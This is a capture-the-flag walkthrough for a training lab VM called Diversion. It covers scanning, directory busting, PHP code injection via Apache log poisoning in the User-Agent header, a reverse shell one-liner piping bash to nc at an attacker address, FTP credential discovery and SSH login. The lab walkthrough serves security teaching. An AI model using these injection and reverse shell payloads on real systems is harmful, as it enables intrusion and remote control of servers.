Welcome to the Diversion walkthrough! This guide will take you through the steps to identify and exploit the vulnerabilities within this virtual machine. Let’s get started!
Room link:
https://tryhackme.com/jr/diversionIb
Step 1: Enumeration
Start with Nmap Scan:
- Begin by scanning the target machine to identify open ports and services.
nmap -sC -sV -oN nmap_initial_scan.txt <TARGET_IP>
Review Nmap Results:
- The scan reveals the following open ports:
- 22/tcp: SSH
- 80/tcp: HTTP
- 21/tcp: FTP
Step 2: Investigate HTTP Service
Access the Web Server:
- Open the web browser and navigate to
http://<TARGET_IP>/
. You’ll find a login page.
Inspect the Source Code:
- Check the source code of the login page for any clues or vulnerabilities.
Try SQL Injection:
- Attempt a basic SQL injection to bypass the login:
Username: admin' OR '1'='1 Password: anything
Unsuccessful Login:
- The injection is not successful, you cannot log into the system, it was a diversion!
Step 3: Explore the Web Application
Directory Busting:
- Check for other directories on the web server:
dirsearch -u <TARGET_IP> -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
- You’ll find a
test
directory with a singlelog.txt
file. Within it you will see mention of aaccess_log.php
file. This can be accessed athttp://<TARGET_IP>/access_log.php.
Step 4: Code Injection via Apache Logs
Read the /etc/passwd
file:
- Use a tool like
curl
to inject a cat command into the User-Agent header:
curl -A "<?php system('cat /etc/passwd'); ?>" http://<TARGET_IP>
- Navigate to the
access_log.php
file - Make note of a user named
jimmy
- For a more advanced technique, challenge yourself to inject reverse shell code into the log file.
- For example:
rlwrap -cAr nc -lvnp 80
curl -A "<?php exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.9.2.91 80 >/tmp/f'); ?>" http://10.10.158.198/
Step 5: Exploit FTP
FTP Enumeration:
- Connect to the FTP service and look for any interesting files:
ftp <TARGET_IP>
- Check for anonymous login or default credentials. You will find a
adminnote.txt
file with mention of weak passwords being used:password123
Step 6: SSH
- We can SSH into the user account
jimmy
using the found credentialspassword123
ssh jimmy@<TARGET_IP>
Step 7: Privilege Escalation
Check Sudo Permissions:
- Once you have a shell, check for any sudo permissions:
sudo -l
Exploit Weak Passwords:
- If you find any users with weak passwords, use them to escalate privileges:
su <username>
Step 8: Capture the Flags
Locate User Flag:
- Navigate to the user’s home directory and capture the user flag:
cat /home/<username>/local.txt
cat /root/proof.txt
Conclusion
Congratulations! You’ve successfully exploited the Diversion VM and captured all the flags. This walkthrough covered SQL injection, Apache log file code injection, FTP, and privilege escalation techniques. Always remember to follow ethical guidelines and use your skills for good.
Happy hacking!